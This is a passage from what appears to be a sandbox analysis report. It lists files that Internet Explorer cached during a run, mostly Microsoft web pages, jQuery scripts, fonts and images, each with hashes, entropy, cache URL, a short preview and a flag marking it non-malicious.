                                                                                                                                                                                                              Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\featureSync[1].gif
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):807
                                                                                                                                                                                                              Entropy (8bit):0.2929836665455332
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CUI/lylAxBFzen:0he
                                                                                                                                                                                                              MD5:18B3E43ABAD26BDAC6F4CEA944777B62
                                                                                                                                                                                                              SHA1:5848CD0ACA8D9FC92D8449B13F829CC1F6CD310A
                                                                                                                                                                                                              SHA-256:3CA19E57C9A2465AE4DF271316BA4D29E7FF7F113A2A2C5297780C0B7A0AC09D
                                                                                                                                                                                                              SHA-512:1615D2831EE2B7A6FDA558521CC36AA0974262869F162635B6321644E23B278808B1760979CE30EC4B2BBC41AF487E1E434370B5905D7846E0904C4550D7B4BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://account.xbox.com/en-US/featureSync.gif
                                                                                                                                                                                                              Preview: GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\httpErrorPagesScripts[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8714
                                                                                                                                                                                                              Entropy (8bit):5.312819714818054
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:xmjriGCiOciwd1BtvjrG8tAGGGHmjOWnvyJVUXiki3ayimi5ezxiV:xmjriGCi/i+1Btvjy815HmjqVUXiki3g
                                                                                                                                                                                                              MD5:3F57B781CB3EF114DD0B665151571B7B
                                                                                                                                                                                                              SHA1:CE6A63F996DF3A1CCCB81720E21204B825E0238C
                                                                                                                                                                                                              SHA-256:46E019FA34465F4ED096A9665D1827B54553931AD82E98BE01EDB1DDBC94D3AD
                                                                                                                                                                                                              SHA-512:8CBF4EF582332AE7EA605F910AD6F8A4BC28513482409FA84F08943A72CAC2CF0FA32B6AF4C20C697E1FAC2C5BA16B5A64A23AF0C11EEFBF69625B8F9F90C8FA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function expandCollapse(elem,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\info_48[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4113
                                                                                                                                                                                                              Entropy (8bit):7.9370830126943375
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                                                              MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                                                              SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                                                              SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                                                              SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jquery-1.11.2.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):95931
                                                                                                                                                                                                              Entropy (8bit):5.394232486761965
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:5P1vk7i6GUHdXXeyQazBu+4HhiO2AEeLNFoqqhJ7SerN5sVI6xcBgPv7E+nzms9d:A4Ud4qhJvNPqcB47MfWWca98HrB
                                                                                                                                                                                                              MD5:5790EAD7AD3BA27397AEDFA3D263B867
                                                                                                                                                                                                              SHA1:8130544C215FE5D1EC081D83461BF4A711E74882
                                                                                                                                                                                                              SHA-256:2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0
                                                                                                                                                                                                              SHA-512:781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js
                                                                                                                                                                                                              Preview: /*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jquery-3.3.1.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):86929
                                                                                                                                                                                                              Entropy (8bit):5.289492706499139
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:aLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6ta:+kn6x2xe9NK6nC6E
                                                                                                                                                                                                              MD5:378087A64E1394FC51F300BB9C11878C
                                                                                                                                                                                                              SHA1:0C3192B500A4FD550E483CF77A49806A5872185B
                                                                                                                                                                                                              SHA-256:4FE68FA216176E6D1F4580E924BAFECC9F519984ECC06B1A840A08B0D88C95DE
                                                                                                                                                                                                              SHA-512:9A2C70516EA0C8C37C7F072F214DE0AFD5DDEB643C6B5D3FA8ADE3EF8D2CE40BDF8B1B1194BAD296E9075562701EE7DAE48B18144B1CD2D735328BE5A3ACCBE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-storeexp-neu-ms-com.akamaized.net/_h/46c44584/coreui.statics/externalscripts/jquery/jquery-3.3.1.min.js
                                                                                                                                                                                                              Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */..!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jquery-ui.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):238314
                                                                                                                                                                                                              Entropy (8bit):5.145714836445267
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:2xDk6UPS1lippePIlYI7pSDzOyAskRsPoeQ9+SuC:yU+lgtYIUGeQ9XuC
                                                                                                                                                                                                              MD5:DFE3ECF96456F8CAFC12A7F48DE6B8C8
                                                                                                                                                                                                              SHA1:9927AFBB31DF93A76977A676A933B7E3696D61BA
                                                                                                                                                                                                              SHA-256:E09639315704980552B92EAAE21F66AF00A6E8A371F757F76B0B12420C2ED2A7
                                                                                                                                                                                                              SHA-512:3D892EE75916931C6E8743A24078BC20DC1F0C455C11EF49601899080DB51B421319D11453BB1C1214F2BADB7AF632B9F75BCA2660613CC3FEC9831DE89F3C9D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://ajax.aspnetcdn.com/ajax/jquery.ui/1.11.1/jquery-ui.min.js
                                                                                                                                                                                                              Preview: /*! jQuery UI - v1.11.1 - 2014-08-13.* http://jqueryui.com.* Includes: core.js, widget.js, mouse.js, position.js, accordion.js, autocomplete.js, button.js, datepicker.js, dialog.js, draggable.js, droppable.js, effect.js, effect-blind.js, effect-bounce.js, effect-clip.js, effect-drop.js, effect-explode.js, effect-fade.js, effect-fold.js, effect-highlight.js, effect-puff.js, effect-pulsate.js, effect-scale.js, effect-shake.js, effect-size.js, effect-slide.js, effect-transfer.js, menu.js, progressbar.js, resizable.js, selectable.js, selectmenu.js, slider.js, sortable.js, spinner.js, tabs.js, tooltip.js.* Copyright 2014 jQuery Foundation and other contributors; Licensed MIT */..(function(e){"function"==typeof define&&define.amd?define(["jquery"],e):e(jQuery)})(function(e){function t(t,s){var n,a,o,r=t.nodeName.toLowerCase();return"area"===r?(n=t.parentNode,a=n.name,t.href&&a&&"map"===n.nodeName.toLowerCase()?(o=e("img[usemap='#"+a+"']")[0],!!o&&i(o)):!1):(/input|select|textarea|button|obje
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jsll-4[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):56291
                                                                                                                                                                                                              Entropy (8bit):5.402726813102013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:0tgoOjNcc6rCDBjPSeAaKU7rD8kc7HhAHZcllEiKjkT3dgD4GD1hrTd8PuWCF9IS:0tV81ICDVRQnhAiUinxgDRQ7wYv6p
                                                                                                                                                                                                              MD5:CAF5C715307CB80BD4B30E2DA8E95C37
                                                                                                                                                                                                              SHA1:961579FB71954E027DD519058F6E2DA3D83EB7C2
                                                                                                                                                                                                              SHA-256:E246EFF2F6AE3E255A06EB561E6FC93AE3BEF2CCE22C5E0124D713C15F80567C
                                                                                                                                                                                                              SHA-512:DAB733460AFF828BBC696B159D8B0B3877E648FD4E3E59A913865C676032816B4599D5390326C7EFE652C5636C5B4F56B9D78413EB19AD19E5616D049BC775B0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://az725175.vo.msecnd.net/scripts/jsll-4.js
                                                                                                                                                                                                              Preview: var awa=awa||{},behaviorKey;awa.isInitialized=!1;awa.verbosityLevels={NONE:0,ERROR:1,WARNING:2,INFORMATION:3};awa.behavior={UNDEFINED:0,NAVIGATIONBACK:1,NAVIGATION:2,NAVIGATIONFORWARD:3,APPLY:4,REMOVE:5,SORT:6,EXPAND:7,REDUCE:8,CONTEXTMENU:9,TAB:10,COPY:11,EXPERIMENTATION:12,PRINT:13,SHOW:14,HIDE:15,MAXIMIZE:16,MINIMIZE:17,BACKBUTTON:18,STARTPROCESS:20,PROCESSCHECKPOINT:21,COMPLETEPROCESS:22,SCENARIOCANCEL:23,DOWNLOADCOMMIT:40,DOWNLOAD:41,SEARCHAUTOCOMPLETE:60,SEARCH:61,SEARCHINITIATE:62,TEXTBOXINPUT:63,PURCHASE:80,ADDTOCART:81,VIEWCART:82,ADDWISHLIST:83,FINDSTORE:84,CHECKOUT:85,REMOVEFROMCART:86,PURCHASECOMPLETE:87,VIEWCHECKOUTPAGE:88,VIEWCARTPAGE:89,VIEWPDP:90,UPDATEITEMQUANTITY:91,INTENTTOBUY:92,PUSHTOINSTALL:93,SIGNIN:100,SIGNOUT:101,SOCIALSHARE:120,SOCIALLIKE:121,SOCIALREPLY:122,CALL:123,EMAIL:124,COMMUNITY:125,SOCIALFOLLOW:126,VOTE:140,SURVEYINITIATE:141,SURVEYCOMPLETE:142,REPORTAPPLICATION:143,REPORTREVIEW:144,SURVEYCHECKPOINT:145,CONTACT:160,REGISTRATIONINITIATE:161,REGISTRATIO
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\latest[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 33556, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):33556
                                                                                                                                                                                                              Entropy (8bit):7.986987433752767
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:agf2aMu68W993ufOSHOWuwtfLVebDm6r9j3oqlHH:hf2vuYb3IPHOdaJmp3Dn
                                                                                                                                                                                                              MD5:637B1F43DE4B96B9446ADCC107C5F688
                                                                                                                                                                                                              SHA1:3FAD425F0C1CFE8711888CD877E122E5F8D2C15A
                                                                                                                                                                                                              SHA-256:0ED2DC761DDF650B9AAB0C366F43DDEA0DB81E13BBE603A21F2BFEF519387CE9
                                                                                                                                                                                                              SHA-512:9B48ED55813F9A372F1E1BE5FEF737B0583E8990B9B0D57A7810EEC5F55D5C9CC55739D3DC3A2851009964C34C82F1D0D9B58EC05A212779667A023DB8804BF5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff
                                                                                                                                                                                                              Preview: wOFF........................................OS/2...D...X...`J..%cmap..............<.cvt ...........L/.+}fpgm............".[.gasp...|.........<..glyf......m....,....head..x$...6...6.X.hhea..x\...!...$.<.Jhmtx..x............loca..|..........{.maxp....... ... ....name...0........ DE.post........... .Q.wprep...0.......ibMktx.c`f.`8.....:....Q.B3_dHc..`e.feb.B&....e...'.(..VP.R....^........(0.$...:.H)00..<W..x.e.{L.U..?..E../..7<<..-.?.M...K6...M%.4@..E.DM*s1.S....f.]t..4L..t3//o.R7..}.N/.....9g...o./ .V....._..x.I.Z..O.5DC5B.5V...\M.czJ.Z...V......g.S.,r.:..G...s&........V..;1{p.$..3....d.,3.L6......In_7...#..7.-..q.-.......+.CH}t...j.Fj......t=..*R..b<.]x.8M....x...I5....<..x.-O.N........7.s....$zBl....&......?.S.>..z...^.w.k..N....G..m..J[G..BgEj#.#."..R.<...$......e.pVx....W.9..l...v....UdU...y.U.6....H.RC...n.V5(...7.........vv....([..Z.....f'.yIb-..@......8.2....i....&G9.[.f....+...c|......PH3..=o3.....?.#....H..R.|J(%...X.".S......T....J......._.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\meCore.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):102323
                                                                                                                                                                                                              Entropy (8bit):5.253218794584848
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:I7uoUCePnnlneqFpJrJjsV72lzTP9/cTOhGyEo7oYnOG:2WleMVLGyEo7oYnOG
                                                                                                                                                                                                              MD5:938C0EE4342607BC63B6875ADDF443E8
                                                                                                                                                                                                              SHA1:A487080319AA3AF914459628A0CC15C19DE3BBC5
                                                                                                                                                                                                              SHA-256:F3F0CB391D3DB91B520F00C446805B93A2AA2BE14F3205EAB05D1480129771A8
                                                                                                                                                                                                              SHA-512:0C94962AAB8AA88D27A8D6357A7D98565CCAB460C30B64A9FF36701A0745C3CFA202E6ACB0C9CDB9DC7E84696F290FC982765D5F7E02101B7B08B49D4E52C831
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/scripts/me/MeControl/10.21123.2/de-DE/meCore.min.js
                                                                                                                                                                                                              Preview: MeControlDefine("meCore",["exports","@mecontrol/web-inline","@mecontrol/web-boot"],function(t,f,h){"use strict";var r=function(t,e){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function e(t,e){function n(){this.constructor=t}r(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var d=function(){return(d=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)},s=function(){},i={},u=[],l=[];function v(t,e){var n,r,o,i,a=l;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((r=u.pop())&&void 0!==r.pop)for(i=r.length;i--;)u.push(r[i]);else"boolean"==typeof r&&(r=null),(o="function"!=typeof t)&&(null==r?r="":"number"==typeof r?r=String(r):"s
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\me[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30981
                                                                                                                                                                                                              Entropy (8bit):5.436570479623442
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:/g7XrUJds35bd8cArWg7XrUJds35bd8cArDg7XrUJds35bd8cArv:iw25KDw25KWw25Kv
                                                                                                                                                                                                              MD5:06152244381DE7D3B254A3BC257C75D7
                                                                                                                                                                                                              SHA1:78175D76BAAC2961000A9BBA7313A93E5B8EB04C
                                                                                                                                                                                                              SHA-256:A7F8EB60A91C847213A453B57F41B0138A59746D2A208FF3F48E443CEC055AD2
                                                                                                                                                                                                              SHA-512:F2D91A7D9A8B39387EB80260B5827EAE807B49679353D3F38928317BF5BC581EEB39F6F0E65865BBAA40183CC8D36AC90314D9EB385D80643291A76B0F4A4130
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html> ServerInfo: BY1PPF403D8BB32 2021.04.29.10.43.41 LocVer:0 --> PreprocessInfo: azbldrun:AzBuildW2-Ha13, 2021-04-29T10:39:37.8613138-07:00 - Version: 16,0,29025,2 --> RequestLCID: 1033, Market:EN-US, PrefCountry: US, LangLCID: 1033, LangISO: EN --><html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><base href="https://login.live.com"/><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=3b41672ebf974f720c2aca5a9e5ca1d8"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Windows Live ID</title><meta name="robots" content="none" /><meta name="PageID" content=""/><meta name="S
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\meversion[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):27703
                                                                                                                                                                                                              Entropy (8bit):5.241823379599116
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:0nYipPf+462FvZ6QyALeMJyr8ePnVcqMr6tAH6spyo:Ripn+462FvZ1y+Jyr803i6tAH6spyo
                                                                                                                                                                                                              MD5:9179C3259F0F7DA6BC1E946B255039EB
                                                                                                                                                                                                              SHA1:47D703D380E04B1B7C4518225CB0EF233A529A9F
                                                                                                                                                                                                              SHA-256:61FA8869D2DFA4414FD89E5F5768D1DC61696BC71C11FAF5E825B2C8339D5B80
                                                                                                                                                                                                              SHA-512:9737B1F7D420277B8493826882D1297D095D1BBAC4CA5C6D3A2F4563A49FC7D6E624BD8D65ED9C5F2B44E531A515A059FF8633A850931829BC94BEB8867CBE54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/meversion?partner=MSHomePage&market=en-us&uhf=1
                                                                                                                                                                                                              Preview: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"mshomepage","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graph":false,"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/"};window.MeControl=window.MeControl||{};window.MeControl.Config={"ver":"10.21123.2","mkt":"en-US","ptn":"mshomepage","gfx":"https://mem.gfx.ms","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedSce
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microsoft-365[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):180083
                                                                                                                                                                                                              Entropy (8bit):5.353120811025661
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:l2HmIRldFEJ9Zm4nzKF5ZH4Kh1LGYhz3jEj9TNfHx7EmI9o/m0RP1UWWTf7FNyni:l2lRld4LUwY0m0RP1UWWTSHq1
                                                                                                                                                                                                              MD5:E8F837386449581B0D7CFFC0BE280370
                                                                                                                                                                                                              SHA1:FC37F58828004214CD249198B250F53B40F20EA6
                                                                                                                                                                                                              SHA-256:22F6213276DC4ACD22CFCF154F86F8C84CAD404954D931F272C262F63BF503BE
                                                                                                                                                                                                              SHA-512:724566C082D06FEFAE6E18DBF6EAED5C17B21A9F3077CAE36557264B3EFC95C2F9E4304CBD204575B14DA92F276C764550D522911D9794598C0D8C1204D8C7AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="de-ch" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;05632838-fd83-46e9-a0f5-8fba34bb389e&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;de-ch&quot;,&quot;l&quot;:&quot;de-ch&quot;,&quot;mu&quot;:&quot;de-ch&quot;,&quot;rp&quot;:&quot;/de-ch/microsoft-365&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title>Microsoft&#160;365 mit Office-Apps | Microsoft
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microsoft-office[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):204274
                                                                                                                                                                                                              Entropy (8bit):5.328019784912956
                                                                                                                                                                                                              Encrypted:false
